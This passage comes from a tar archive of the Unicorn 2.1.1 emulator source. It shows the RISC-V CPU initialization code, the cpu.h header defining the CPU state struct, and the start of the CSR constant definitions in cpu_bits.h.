DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_MMU); set_feature(env, RISCV_FEATURE_PMP); } // sifive-e31 static void rv32imacu_nommu_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV32 | RVI | RVM | RVA | RVC | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_PMP); } #elif defined(TARGET_RISCV64) // rv64 static void riscv_base64_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; /* We set this in the realise function */ set_misa(env, 0); } // sifive-u54 static void rv64gcsu_priv1_10_0_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV64 | RVI | RVM | RVA | RVF | RVD | RVC | RVS | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_MMU); set_feature(env, RISCV_FEATURE_PMP); } // sifive-e51 static void rv64imacu_nommu_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV64 | RVI | RVM | RVA | RVC | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_PMP); } #endif static void riscv_cpu_set_pc(CPUState *cs, vaddr value) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; env->pc = value; } static void riscv_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; env->pc = tb->pc; } static bool riscv_cpu_has_work(CPUState *cs) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; /* * Definition of the WFI instruction requires it to ignore the privilege * mode and delegation registers, but respect individual enables */ return (env->mip & env->mie) != 0; } void restore_state_to_opc(CPURISCVState *env, TranslationBlock *tb, target_ulong *data) { env->pc = data[0]; } static void riscv_cpu_reset(CPUState *dev) { CPUState *cs = CPU(dev); RISCVCPU *cpu = RISCV_CPU(cs); RISCVCPUClass *mcc = RISCV_CPU_GET_CLASS(cpu); CPURISCVState *env = &cpu->env; mcc->parent_reset(cs); env->priv = PRV_M; env->mstatus &= ~(MSTATUS_MIE | MSTATUS_MPRV); env->mcause = 0; env->pc = env->resetvec; cs->exception_index = EXCP_NONE; env->load_res = -1; set_default_nan_mode(1, &env->fp_status); } static void riscv_cpu_realize(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); RISCVCPU *cpu = RISCV_CPU(dev); CPURISCVState *env = &cpu->env; int priv_version = PRIV_VERSION_1_11_0; target_ulong target_misa = 0; cpu_exec_realizefn(cs); if (cpu->cfg.priv_spec) { if (!g_strcmp0(cpu->cfg.priv_spec, "v1.11.0")) { priv_version = PRIV_VERSION_1_11_0; } else if (!g_strcmp0(cpu->cfg.priv_spec, "v1.10.0")) { priv_version = PRIV_VERSION_1_10_0; } else if (!g_strcmp0(cpu->cfg.priv_spec, "v1.9.1")) { priv_version = PRIV_VERSION_1_09_1; } else { // error_setg(errp, "Unsupported privilege spec version '%s'", cpu->cfg.priv_spec); return; } } set_priv_version(env, priv_version); set_resetvec(env, DEFAULT_RSTVEC); if (cpu->cfg.mmu) { set_feature(env, RISCV_FEATURE_MMU); } if (cpu->cfg.pmp) { set_feature(env, RISCV_FEATURE_PMP); } /* If misa isn't set (rv32 and rv64 machines) set it here */ if (!env->misa) { /* Do some ISA extension error checking */ if (cpu->cfg.ext_i && cpu->cfg.ext_e) { //error_setg(errp, "I and E extensions are incompatible"); return; } if (!cpu->cfg.ext_i && !cpu->cfg.ext_e) { // error_setg(errp, "Either I or E extension must be set"); return; } if (cpu->cfg.ext_g && !(cpu->cfg.ext_i & cpu->cfg.ext_m & cpu->cfg.ext_a & cpu->cfg.ext_f & cpu->cfg.ext_d)) { // warn_report("Setting G will also set IMAFD"); cpu->cfg.ext_i = true; cpu->cfg.ext_m = true; cpu->cfg.ext_a = true; cpu->cfg.ext_f = true; cpu->cfg.ext_d = true; } /* Set the ISA extensions, checks should have happened above */ if (cpu->cfg.ext_i) { target_misa |= RVI; } if (cpu->cfg.ext_e) { target_misa |= RVE; } if (cpu->cfg.ext_m) { target_misa |= RVM; } if (cpu->cfg.ext_a) { target_misa |= RVA; } if (cpu->cfg.ext_f) { target_misa |= RVF; } if (cpu->cfg.ext_d) { target_misa |= RVD; } if (cpu->cfg.ext_c) { target_misa |= RVC; } if (cpu->cfg.ext_s) { target_misa |= RVS; } if (cpu->cfg.ext_u) { target_misa |= RVU; } if (cpu->cfg.ext_h) { target_misa |= RVH; } set_misa(env, RVXLEN | target_misa); } cpu_reset(cs); } static void riscv_cpu_init(struct uc_struct *uc, CPUState *obj) { RISCVCPU *cpu = RISCV_CPU(obj); CPURISCVState *env = &cpu->env; // unicorn env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void riscv_cpu_class_init(struct uc_struct *uc, CPUClass *c, void *data) { RISCVCPUClass *mcc = RISCV_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); mcc->parent_reset = cc->reset; cc->reset = riscv_cpu_reset; cc->has_work = riscv_cpu_has_work; cc->do_interrupt = riscv_cpu_do_interrupt; cc->cpu_exec_interrupt = riscv_cpu_exec_interrupt; cc->set_pc = riscv_cpu_set_pc; cc->synchronize_from_tb = riscv_cpu_synchronize_from_tb; cc->do_unaligned_access = riscv_cpu_do_unaligned_access; cc->tcg_initialize = riscv_translate_init; cc->tlb_fill_cpu = riscv_cpu_tlb_fill; } typedef struct CPUModelInfo { const char *name; void (*initfn)(CPUState *obj); } CPUModelInfo; static const CPUModelInfo cpu_models[] = { {TYPE_RISCV_CPU_ANY, riscv_any_cpu_init}, #ifdef TARGET_RISCV32 {TYPE_RISCV_CPU_BASE32, riscv_base32_cpu_init}, {TYPE_RISCV_CPU_SIFIVE_E31, rv32imacu_nommu_cpu_init}, {TYPE_RISCV_CPU_SIFIVE_U34, rv32gcsu_priv1_10_0_cpu_init}, #endif #ifdef TARGET_RISCV64 {TYPE_RISCV_CPU_BASE64, riscv_base64_cpu_init}, {TYPE_RISCV_CPU_SIFIVE_E51, rv64imacu_nommu_cpu_init}, {TYPE_RISCV_CPU_SIFIVE_U54, rv64gcsu_priv1_10_0_cpu_init}, #endif }; RISCVCPU *cpu_riscv_init(struct uc_struct *uc) { RISCVCPU *cpu; CPUState *cs; CPUClass *cc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } #ifdef TARGET_RISCV32 if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_RISCV32_SIFIVE_U34; } #else /* TARGET_RISCV64 */ if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_RISCV64_SIFIVE_U54; } #endif if (uc->cpu_model >= ARRAY_SIZE(cpu_models)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init RISCVCPUClass */ riscv_cpu_class_init(uc, cc, NULL); /* init device properties*/ cpu->cfg.ext_i = true; cpu->cfg.ext_e = false; cpu->cfg.ext_g = true; cpu->cfg.ext_m = true; cpu->cfg.ext_a = true; cpu->cfg.ext_f = true; cpu->cfg.ext_d = true; cpu->cfg.ext_c = true; cpu->cfg.ext_s = true; cpu->cfg.ext_u = true; cpu->cfg.ext_h = false; cpu->cfg.ext_counters = true; cpu->cfg.ext_ifencei = true; cpu->cfg.ext_icsr = true; cpu->cfg.priv_spec = "v1.11.0"; cpu->cfg.mmu = true; cpu->cfg.pmp = true; /* init CPUState */ cpu_common_initfn(uc, cs); /* init CPU */ riscv_cpu_init(uc, cs); /* init specific CPU model */ cpu_models[uc->cpu_model].initfn(cs); /* realize CPU */ riscv_cpu_realize(uc, cs); // init addresss space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu.h���������������������������������������������������������������0000664�0000000�0000000�00000025412�14675241067�0017533�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU RISC-V CPU * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2017-2018 SiFive, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef RISCV_CPU_H #define RISCV_CPU_H #include "hw/core/cpu.h" #include "exec/cpu-defs.h" #include "fpu/softfloat-types.h" typedef struct TCGContext TCGContext; #define TYPE_RISCV_CPU "riscv-cpu" #define RISCV_CPU_TYPE_SUFFIX "-" TYPE_RISCV_CPU #define RISCV_CPU_TYPE_NAME(name) (name RISCV_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_RISCV_CPU #define TYPE_RISCV_CPU_ANY RISCV_CPU_TYPE_NAME("any") #define TYPE_RISCV_CPU_BASE32 RISCV_CPU_TYPE_NAME("rv32") #define TYPE_RISCV_CPU_BASE64 RISCV_CPU_TYPE_NAME("rv64") #define TYPE_RISCV_CPU_SIFIVE_E31 RISCV_CPU_TYPE_NAME("sifive-e31") #define TYPE_RISCV_CPU_SIFIVE_E51 RISCV_CPU_TYPE_NAME("sifive-e51") #define TYPE_RISCV_CPU_SIFIVE_U34 RISCV_CPU_TYPE_NAME("sifive-u34") #define TYPE_RISCV_CPU_SIFIVE_U54 RISCV_CPU_TYPE_NAME("sifive-u54") #define RV32 ((target_ulong)1 << (TARGET_LONG_BITS - 2)) #define RV64 ((target_ulong)2 << (TARGET_LONG_BITS - 2)) #if defined(TARGET_RISCV32) #define RVXLEN RV32 #elif defined(TARGET_RISCV64) #define RVXLEN RV64 #endif #define RV(x) ((target_ulong)1 << (x - 'A')) #define RVI RV('I') #define RVE RV('E') /* E and I are mutually exclusive */ #define RVM RV('M') #define RVA RV('A') #define RVF RV('F') #define RVD RV('D') #define RVC RV('C') #define RVS RV('S') #define RVU RV('U') #define RVH RV('H') /* S extension denotes that Supervisor mode exists, however it is possible to have a core that support S mode but does not have an MMU and there is currently no bit in misa to indicate whether an MMU exists or not so a cpu features bitfield is required, likewise for optional PMP support */ enum { RISCV_FEATURE_MMU, RISCV_FEATURE_PMP, RISCV_FEATURE_MISA }; #define PRIV_VERSION_1_09_1 0x00010901 #define PRIV_VERSION_1_10_0 0x00011000 #define PRIV_VERSION_1_11_0 0x00011100 #define TRANSLATE_PMP_FAIL 2 #define TRANSLATE_FAIL 1 #define TRANSLATE_SUCCESS 0 #define MMU_USER_IDX 3 #define MAX_RISCV_PMPS (16) typedef struct CPURISCVState CPURISCVState; #include "pmp.h" struct CPURISCVState { target_ulong gpr[32]; uint64_t fpr[32]; /* assume both F and D extensions */ target_ulong pc; target_ulong load_res; target_ulong load_val; target_ulong frm; target_ulong badaddr; target_ulong guest_phys_fault_addr; target_ulong priv_ver; target_ulong misa; target_ulong misa_mask; uint32_t features; target_ulong priv; /* This contains QEMU specific information about the virt state. */ target_ulong virt; target_ulong resetvec; target_ulong mhartid; target_ulong mstatus; target_ulong mip; #ifdef TARGET_RISCV32 target_ulong mstatush; #endif uint32_t miclaim; target_ulong mie; target_ulong mideleg; target_ulong sptbr; /* until: priv-1.9.1 */ target_ulong satp; /* since: priv-1.10.0 */ target_ulong sbadaddr; target_ulong mbadaddr; target_ulong medeleg; target_ulong stvec; target_ulong sepc; target_ulong scause; target_ulong mtvec; target_ulong mepc; target_ulong mcause; target_ulong mtval; /* since: priv-1.10.0 */ /* Hypervisor CSRs */ target_ulong hstatus; target_ulong hedeleg; target_ulong hideleg; target_ulong hcounteren; target_ulong htval; target_ulong htinst; target_ulong hgatp; uint64_t htimedelta; /* Virtual CSRs */ target_ulong vsstatus; target_ulong vstvec; target_ulong vsscratch; target_ulong vsepc; target_ulong vscause; target_ulong vstval; target_ulong vsatp; #ifdef TARGET_RISCV32 target_ulong vsstatush; #endif target_ulong mtval2; target_ulong mtinst; /* HS Backup CSRs */ target_ulong stvec_hs; target_ulong sscratch_hs; target_ulong sepc_hs; target_ulong scause_hs; target_ulong stval_hs; target_ulong satp_hs; target_ulong mstatus_hs; #ifdef TARGET_RISCV32 target_ulong mstatush_hs; #endif target_ulong scounteren; target_ulong mcounteren; target_ulong sscratch; target_ulong mscratch; /* temporary htif regs */ uint64_t mfromhost; uint64_t mtohost; uint64_t timecmp; /* physical memory protection */ pmp_table_t pmp_state; /* machine specific rdtime callback */ uint64_t (*rdtime_fn)(void); /* True if in debugger mode. */ bool debugger; float_status fp_status; /* Fields from here on are preserved across CPU reset. */ QEMUTimer *timer; /* Internal timer */ // Unicorn engine struct uc_struct *uc; }; /** * RISCVCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A RISCV CPU model. */ typedef struct RISCVCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } RISCVCPUClass; /** * RISCVCPU: * @env: #CPURISCVState * * A RISCV CPU. */ typedef struct RISCVCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPURISCVState env; /* Configuration Settings */ struct { bool ext_i; bool ext_e; bool ext_g; bool ext_m; bool ext_a; bool ext_f; bool ext_d; bool ext_c; bool ext_s; bool ext_u; bool ext_h; bool ext_counters; bool ext_ifencei; bool ext_icsr; char *priv_spec; char *user_spec; bool mmu; bool pmp; } cfg; struct RISCVCPUClass cc; } RISCVCPU; #define RISCV_CPU(obj) ((RISCVCPU *)obj) #define RISCV_CPU_CLASS(klass) ((RISCVCPUClass *)klass) #define RISCV_CPU_GET_CLASS(obj) (&((RISCVCPU *)obj)->cc) static inline int riscv_has_ext(CPURISCVState *env, target_ulong ext) { return (env->misa & ext) != 0; } static inline bool riscv_feature(CPURISCVState *env, int feature) { return env->features & (1ULL << feature); } #include "cpu_user.h" #include "cpu_bits.h" extern const char * const riscv_int_regnames[]; extern const char * const riscv_fpr_regnames[]; extern const char * const riscv_excp_names[]; extern const char * const riscv_intr_names[]; void riscv_cpu_do_interrupt(CPUState *cpu); int riscv_cpu_gdb_read_register(CPUState *cpu, GByteArray *buf, int reg); int riscv_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); bool riscv_cpu_exec_interrupt(CPUState *cs, int interrupt_request); bool riscv_cpu_fp_enabled(CPURISCVState *env); bool riscv_cpu_virt_enabled(CPURISCVState *env); void riscv_cpu_set_virt_enabled(CPURISCVState *env, bool enable); bool riscv_cpu_force_hs_excep_enabled(CPURISCVState *env); void riscv_cpu_set_force_hs_excep(CPURISCVState *env, bool enable); int riscv_cpu_mmu_index(CPURISCVState *env, bool ifetch); hwaddr riscv_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void riscv_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); bool riscv_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void riscv_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); #define cpu_mmu_index riscv_cpu_mmu_index void riscv_cpu_swap_hypervisor_regs(CPURISCVState *env); int riscv_cpu_claim_interrupts(RISCVCPU *cpu, uint32_t interrupts); uint32_t riscv_cpu_update_mip(RISCVCPU *cpu, uint32_t mask, uint32_t value); #define BOOL_TO_MASK(x) (-!!(x)) /* helper for riscv_cpu_update_mip value */ void riscv_cpu_set_rdtime_fn(CPURISCVState *env, uint64_t (*fn)(void)); void riscv_cpu_set_mode(CPURISCVState *env, target_ulong newpriv); void riscv_translate_init(struct uc_struct *uc); void QEMU_NORETURN riscv_raise_exception(CPURISCVState *env, uint32_t exception, uintptr_t pc); target_ulong riscv_cpu_get_fflags(CPURISCVState *env); void riscv_cpu_set_fflags(CPURISCVState *env, target_ulong); #define TB_FLAGS_MMU_MASK 3 #define TB_FLAGS_MSTATUS_FS MSTATUS_FS static inline void cpu_get_tb_cpu_state(CPURISCVState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->pc; *cs_base = 0; *flags = cpu_mmu_index(env, 0); if (riscv_cpu_fp_enabled(env)) { *flags |= env->mstatus & MSTATUS_FS; } } int riscv_csrrw(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); int riscv_csrrw_debug(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static inline void riscv_csr_write(CPURISCVState *env, int csrno, target_ulong val) { riscv_csrrw(env, csrno, NULL, val, MAKE_64BIT_MASK(0, TARGET_LONG_BITS)); } static inline target_ulong riscv_csr_read(CPURISCVState *env, int csrno) { target_ulong val = 0; riscv_csrrw(env, csrno, &val, 0, 0); return val; } typedef int (*riscv_csr_predicate_fn)(CPURISCVState *env, int csrno); typedef int (*riscv_csr_read_fn)(CPURISCVState *env, int csrno, target_ulong *ret_value); typedef int (*riscv_csr_write_fn)(CPURISCVState *env, int csrno, target_ulong new_value); typedef int (*riscv_csr_op_fn)(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); typedef struct { riscv_csr_predicate_fn predicate; riscv_csr_read_fn read; riscv_csr_write_fn write; riscv_csr_op_fn op; } riscv_csr_operations; void riscv_get_csr_ops(int csrno, riscv_csr_operations *ops); void riscv_set_csr_ops(int csrno, riscv_csr_operations *ops); void riscv_cpu_register_gdb_regs_for_features(CPUState *cs); typedef CPURISCVState CPUArchState; typedef RISCVCPU ArchCPU; #include "exec/cpu-all.h" #endif /* RISCV_CPU_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu_bits.h����������������������������������������������������������0000664�0000000�0000000�00000046072�14675241067�0020561�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* RISC-V ISA constants */ #ifndef TARGET_RISCV_CPU_BITS_H #define TARGET_RISCV_CPU_BITS_H #define get_field(reg, mask) (((reg) & \ (target_ulong)(mask)) / ((mask) & ~((mask) << 1))) #define set_field(reg, mask, val) (((reg) & ~(target_ulong)(mask)) | \ (((target_ulong)(val) * ((mask) & ~((mask) << 1))) & \ (target_ulong)(mask))) /* Floating point round mode */ #define FSR_RD_SHIFT 5 #define FSR_RD (0x7 << FSR_RD_SHIFT) /* Floating point accrued exception flags */ #define FPEXC_NX 0x01 #define FPEXC_UF 0x02 #define FPEXC_OF 0x04 #define FPEXC_DZ 0x08 #define FPEXC_NV 0x10 /* Floating point status register bits */ #define FSR_AEXC_SHIFT 0 #define FSR_NVA (FPEXC_NV << FSR_AEXC_SHIFT) #define FSR_OFA (FPEXC_OF << FSR_AEXC_SHIFT) #define FSR_UFA (FPEXC_UF << FSR_AEXC_SHIFT) #define FSR_DZA (FPEXC_DZ << FSR_AEXC_SHIFT) #define FSR_NXA (FPEXC_NX << FSR_AEXC_SHIFT) #define FSR_AEXC (FSR_NVA | FSR_OFA | FSR_UFA | FSR_DZA | FSR_NXA) /* Control and Status Registers */ /* User Trap Setup */ #define CSR_USTATUS 0x000 #define CSR_UIE 0x004 #define CSR_UTVEC 0x005 /* User Trap Handling */ #define CSR_USCRATCH 0x040 #define CSR_UEPC 0x041 #define CSR_UCAUSE 0x042 #define CSR_UTVAL 0x043 #define CSR_UIP 0x044 /* User Floating-Point CSRs */ #define CSR_FFLAGS 0x001 #define CSR_FRM 0x002 #define CSR_FCSR 0x003 /* User Timers and Counters */ #define CSR_CYCLE 0xc00 #define CSR_TIME 0xc01 #define CSR_INSTRET 0xc02 #define CSR_HPMCOUNTER3 0xc03 #define CSR_HPMCOUNTER4 0xc04 #define CSR_HPMCOUNTER5 0xc05 #define CSR_HPMCOUNTER6 0xc06 #define CSR_HPMCOUNTER7 0xc07 #define CSR_HPMCOUNTER8 0xc08 #define CSR_HPMCOUNTER9 0xc09 #define CSR_HPMCOUNTER10 0xc0a #define CSR_HPMCOUNTER11 0xc0b #define CSR_HPMCOUNTER12 0xc0c #define CSR_HPMCOUNTER13 0xc0d #define CSR_HPMCOUNTER14 0xc0e #define CSR_HPMCOUNTER15 0xc0f #define CSR_HPMCOUNTER16 0xc10 #define CSR_HPMCOUNTER17 0xc11 #define CSR_HPMCOUNTER18 0xc12 #define CSR_HPMCOUNTER19 0xc13 #define CSR_HPMCOUNTER20 0xc14 #define CSR_HPMCOUNTER21 0xc15 #define CSR_HPMCOUNTER22 0xc16 #define CSR_HPMCOUNTER23 0xc17 #define CSR_HPMCOUNTER24 0xc18 #define CSR_HPMCOUNTER25 0xc19 #define CSR_HPMCOUNTER26 0xc1a #define CSR_HPMCOUNTER27 0xc1b #define CSR_HPMCOUNTER28 0xc1c #define CSR_HPMCOUNTER29 0xc1d #define CSR_HPMCOUNTER30 0xc1e #define CSR_HPMCOUNTER31 0xc1f #define CSR_CYCLEH 0xc80 #define CSR_TIMEH 0xc81 #define CSR_INSTRETH 0xc82 #define CSR_HPMCOUNTER3H 0xc83 #define CSR_HPMCOUNTER4H 0xc84 #define CSR_HPMCOUNTER5H 0xc85 #define CSR_HPMCOUNTER6H 0xc86 #define CSR_HPMCOUNTER7H 0xc87 #define CSR_HPMCOUNTER8H 0xc88 #define CSR_HPMCOUNTER9H 0xc89 #define CSR_HPMCOUNTER10H 0xc8a #define CSR_HPMCOUNTER11H 0xc8b #define CSR_HPMCOUNTER12H 0xc8c #define CSR_HPMCOUNTER13H 0xc8d #define CSR_HPMCOUNTER14H 0xc8e #define CSR_HPMCOUNTER15H 0xc8f #define CSR_HPMCOUNTER16H 0xc90 #define CSR_HPMCOUNTER17H 0xc91 #define CSR_HPMCOUNTER18H 0xc92 #define CSR_HPMCOUNTER19H 0xc93 #define CSR_HPMCOUNTER20H 0xc94 #define CSR_HPMCOUNTER21H 0xc95 #define CSR_HPMCOUNTER22H 0xc96 #define CSR_HPMCOUNTER23H 0xc97 #define CSR_HPMCOUNTER24H 0xc98 #define CSR_HPMCOUNTER25H 0xc99 #define CSR_HPMCOUNTER26H 0xc9a #define CSR_HPMCOUNTER27H 0xc9b #define CSR_HPMCOUNTER28H 0xc9c #define CSR_HPMCOUNTER29H 0xc9d #define CSR_HPMCOUNTER30H 0xc9e #define CSR_HPMCOUNTER31H 0xc9f /* Machine Timers and Counters */ #define CSR_MCYCLE 0xb00 #define CSR_MINSTRET 0xb02 #define CSR_MCYCLEH 0xb80 #define CSR_MINSTRETH 0xb82 /* Machine Information Registers */ #define CSR_MVENDORID 0xf11 #define CSR_MARCHID 0xf12 #define CSR_MIMPID 0xf13 #define CSR_MHARTID 0xf14 /* Machine Trap Setup */ #define CSR_MSTATUS 0x300 #define CSR_MISA 0x301 #define CSR_MEDELEG 0x302 #define CSR_MIDELEG 0x303 #define CSR_MIE 0x304 #define CSR_MTVEC 0x305 #define CSR_MCOUNTEREN 0x306 /* 32-bit only */ #define CSR_MSTATUSH 0x310 /* Legacy Counter Setup (priv v1.9.1) */ /* Update to #define CSR_MCOUNTINHIBIT 0x320 for 1.11.0 */ #define CSR_MUCOUNTEREN 0x320 #define CSR_MSCOUNTEREN 0x321 #define CSR_MHCOUNTEREN 0x322 /* Machine Trap Handling */ #define CSR_MSCRATCH 0x340 #define CSR_MEPC 0x341 #define CSR_MCAUSE 0x342 #define CSR_MTVAL 0x343 #define CSR_MIP 0x344 /* Legacy Machine Trap Handling (priv v1.9.1) */ #define CSR_MBADADDR 0x343 /* Supervisor Trap Setup */ #define CSR_SSTATUS 0x100 #define CSR_SEDELEG 0x102 #define CSR_SIDELEG 0x103 #define CSR_SIE 0x104 #define CSR_STVEC 0x105 #define CSR_SCOUNTEREN 0x106 /* Supervisor Trap Handling */ #define CSR_SSCRATCH 0x140 #define CSR_SEPC 0x141 #define CSR_SCAUSE 0x142 #define CSR_STVAL 0x143 #define CSR_SIP 0x144 /* Legacy Supervisor Trap Handling (priv v1.9.1) */ #define CSR_SBADADDR 0x143 /* Supervisor Protection and Translation */ #define CSR_SPTBR 0x180 #define CSR_SATP 0x180 /* Hpervisor CSRs */ #define CSR_HSTATUS 0x600 #define CSR_HEDELEG 0x602 #define CSR_HIDELEG 0x603 #define CSR_HIE 0x604 #define CSR_HCOUNTEREN 0x606 #define CSR_HTVAL 0x643 #define CSR_HIP 0x644 #define CSR_HTINST 0x64A #define CSR_HGATP 0x680 #define CSR_HTIMEDELTA 0x605 #define CSR_HTIMEDELTAH 0x615 #if defined(TARGET_RISCV32) #define HGATP_MODE SATP32_MODE #define HGATP_VMID SATP32_ASID #define HGATP_PPN SATP32_PPN #endif #if defined(TARGET_RISCV64) #define HGATP_MODE SATP64_MODE #define HGATP_VMID SATP64_ASID #define HGATP_PPN SATP64_PPN #endif /* Virtual CSRs */ #define CSR_VSSTATUS 0x200 #define CSR_VSIE 0x204 #define CSR_VSTVEC 0x205 #define CSR_VSSCRATCH 0x240 #define CSR_VSEPC 0x241 #define CSR_VSCAUSE 0x242 #define CSR_VSTVAL 0x243 #define CSR_VSIP 0x244 #define CSR_VSATP 0x280 #define CSR_MTINST 0x34a #define CSR_MTVAL2 0x34b /* Physical Memory Protection */ #define CSR_PMPCFG0 0x3a0 #define CSR_PMPCFG1 0x3a1 #define CSR_PMPCFG2 0x3a2 #define CSR_PMPCFG3 0x3a3 #define CSR_PMPADDR0 0x3b0 #define CSR_PMPADDR1 0x3b1 #define CSR_PMPADDR2 0x3b2 #define CSR_PMPADDR3 0x3b3 #define CSR_PMPADDR4 0x3b4 #define CSR_PMPADDR5 0x3b5 #define CSR_PMPADDR6 0x3b6 #define CSR_PMPADDR7 0x3b7 #define CSR_PMPADDR8 0x3b8 #define CSR_PMPADDR9 0x3b9 #define CSR_PMPADDR10 0x3ba #define CSR_PMPADDR11 0x3bb #define CSR_PMPADDR12 0x3bc #define CSR_PMPADDR13 0x3bd #define CSR_PMPADDR14 0x3be #define CSR_PMPADDR15 0x3bf /* Debug/Trace Registers (shared with Debug Mode) */ #define CSR_TSELECT 0x7a0 #define CSR_TDATA1 0x7a1 #define CSR_TDATA2 0x7a2 #define CSR_TDATA3 0x7a3 /* Debug Mode Registers */ #define CSR_DCSR 0x7b0 #define CSR_DPC 0x7b1 #define CSR_DSCRATCH 0x7b2 /* Performance Counters */ #define CSR_MHPMCOUNTER3 0xb03 #define CSR_MHPMCOUNTER4 0xb04 #define CSR_MHPMCOUNTER5 0xb05 #define CSR_MHPMCOUNTER6 0xb06 #define CSR_MHPMCOUNTER7 0xb07 #define CSR_MHPMCOUNTER8 0xb08 #define CSR_MHPMCOUNTER9 0xb09 #define CSR_MHPMCOUNTER10 0xb0a #define CSR_MHPMCOUNTER11 0xb0b #define CSR_MHPMCOUNTER12 0xb0c #define CSR_MHPMCOUNTER13 0xb0d #define CSR_MHPMCOUNTER14 0xb0e #define CSR_MHPMCOUNTER15 0xb0f #define CSR_MHPMCOUNTER16 0xb10 #define CSR_MHPMCOUNTER17 0xb11 #define CSR_MHPMCOUNTER18 0xb12 #define CSR_MHPMCOUNTER19 0xb13 #define CSR_MHPMCOUNTER20 0xb14 #define CSR_MHPMCOUNTER21 0xb15 #define CSR_MHPMCOUNTER22 0xb16 #define CSR_MHPMCOUNTER23 0xb17 #define CSR_MHPMCOUNTER24 0xb18 #define CSR_MHPMCOUNTER25 0xb19 #define CSR_MHPMCOUNTER26 0xb1a #define CSR_MHPMCOUNTER27 0xb1b #define CSR_MHPMCOUNTER28 0xb1c #define CSR_MHPMCOUNTER29 0xb1d #define CSR_MHPMCOUNTER30 0xb1e #define CSR_MHPMCOUNTER31 0xb1f #define CSR_MHPMEVENT3 0x323 #define CSR_MHPMEVENT4 0x324 #define CSR_MHPMEVENT5 0x325 #define CSR_MHPMEVENT6 0x326 #define CSR_MHPMEVENT7 0x327 #define CSR_MHPMEVENT8 0x328 #define CSR_MHPMEVENT9 0x329 #define CSR_MHPMEVENT10 0x32a #define CSR_MHPMEVENT11 0x32b #define CSR_MHPMEVENT12 0x32c #define CSR_MHPMEVENT13 0x32d #define CSR_MHPMEVENT14 0x32e #define CSR_MHPMEVENT15 0x32f #define CSR_MHPMEVENT16 0x330 #define CSR_MHPMEVENT17 0x331 #define CSR_MHPMEVENT18 0x332 #define CSR_MHPMEVENT19 0x333 #define CSR_MHPMEVENT20 0x334 #define CSR_MHPMEVENT21 0x335 #define CSR_MHPMEVENT22 0x336 #define CSR_MHPMEVENT23 0x337 #define CSR_MHPMEVENT24 0x338 #define CSR_MHPMEVENT25 0x339 #define CSR_MHPMEVENT26 0x33a #define CSR_MHPMEVENT27 0x33b #define CSR_MHPMEVENT28 0x33c #define CSR_MHPMEVENT29 0x33d #define CSR_MHPMEVENT30 0x33e #define CSR_MHPMEVENT31 0x33f #define CSR_MHPMCOUNTER3H 